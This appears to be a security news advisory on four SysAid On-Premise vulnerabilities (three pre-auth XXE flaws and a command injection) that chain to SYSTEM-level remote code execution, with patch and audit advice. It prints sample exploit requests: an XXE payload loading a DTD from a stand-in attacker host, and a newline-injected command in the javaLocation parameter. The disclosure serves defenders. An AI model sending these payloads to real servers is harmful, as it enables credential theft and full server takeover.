SysAid ITSM Platform Vulnerability Enables Pre-Authenticated Remote Code Execution

SysAid, a widely deployed IT Service Management (ITSM) platform, has patched a chain of four critical vulnerabilities in its on-premise software, some of which enable unauthenticated attackers to achieve Remote Code Execution (RCE) with SYSTEM privileges on Windows servers.

The flaws- CVE-2025-2775, CVE-2025-2776, CVE-2025-2777 (all XML External Entity, or XXE, injections), and CVE-2025-2778 (OS Command Injection)-were disclosed by researchers from watchTowr Labs and others, and present a severe risk to organizations running unpatched versions of SysAid.

Technical Details

Product Scope:

• Affected: SysAid On-Premise (self-hosted) versions ≤ 23.3.40
• Not affected: SysAid SaaS (cloud-hosted)

Vulnerability Chain:
The attack chain leverages three pre-authenticated XXE vulnerabilities and one post-authentication OS command injection.
Here’s how the attack unfolds:

1. Pre-Auth XXE Vulnerabilities

• CVE-2025-2775: XXE in /mdm/checkin endpoint.
  The GetMdmMessage#doPost The handler parses user-supplied XML without sanitization, allowing attackers to inject external entities via crafted POST requests.
• CVE-2025-2776: XXE in /mdm/serverurl endpoint.
  Similar to the above, but triggered on a different code path within the same handler.
• CVE-2025-2777: XXE in /lshw endpoint.
  The LshwAgent#doPost The method processes XML input with a SAX parser, again with no input validation, enabling XXE attacks.

Sample Exploit Payload:

textPOST /mdm/checkin HTTP/1.1
Host: target
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://attacker/external.dtd">
%foo;
]>

This causes the server to fetch and process attacker-controlled DTDs, enabling file disclosure or internal network probing.

2. Credential Disclosure

A key impact of these XXEs is the ability to extract the contents of InitAccount.cmd, a file created during installation that contains the plaintext admin username and password.

This file’s first line holds the credentials, which can be exfiltrated using XXE, granting attackers full admin access.

3. Post-Auth OS Command Injection (CVE-2025-2778)

Once admin credentials are obtained, attackers can exploit a command injection flaw in the API settings update functionality.

By injecting newlines and shell commands into the javaLocation parameter, arbitrary commands are written to a batch file (updateApi.bat), which is later executed by the system.

Exploit Example:

textPOST /API.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded

updateApi=false&updateApiSettings=true&javaLocation="%0acalc%0a

This would inject and execute the calc command on the server.

4. Full RCE Chain

By chaining these vulnerabilities, an unauthenticated attacker can escalate from external file disclosure to full remote code execution as SYSTEM, the highest privilege on Windows.

Risk Factor Table

Recommendations

• Immediate Patch: Upgrade SysAid On-Premise to version 24.4.60 b16 or later, which addresses all four vulnerabilities.
• Credential Audit: Change all admin passwords and review for unauthorized access.
• Compromise Assessment: Check for indicators of compromise, including suspicious POST requests and unexpected files in the webroot.
• Restrict Access: Limit external exposure of SysAid servers and enforce network segmentation.

These vulnerabilities underscore the high risk posed by business-critical ITSM platforms like SysAid, especially when exposed to the internet.

The pre-auth nature, trivial exploitability, and potential for complete system compromise make immediate remediation essential for all on-premise SysAid deployments.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates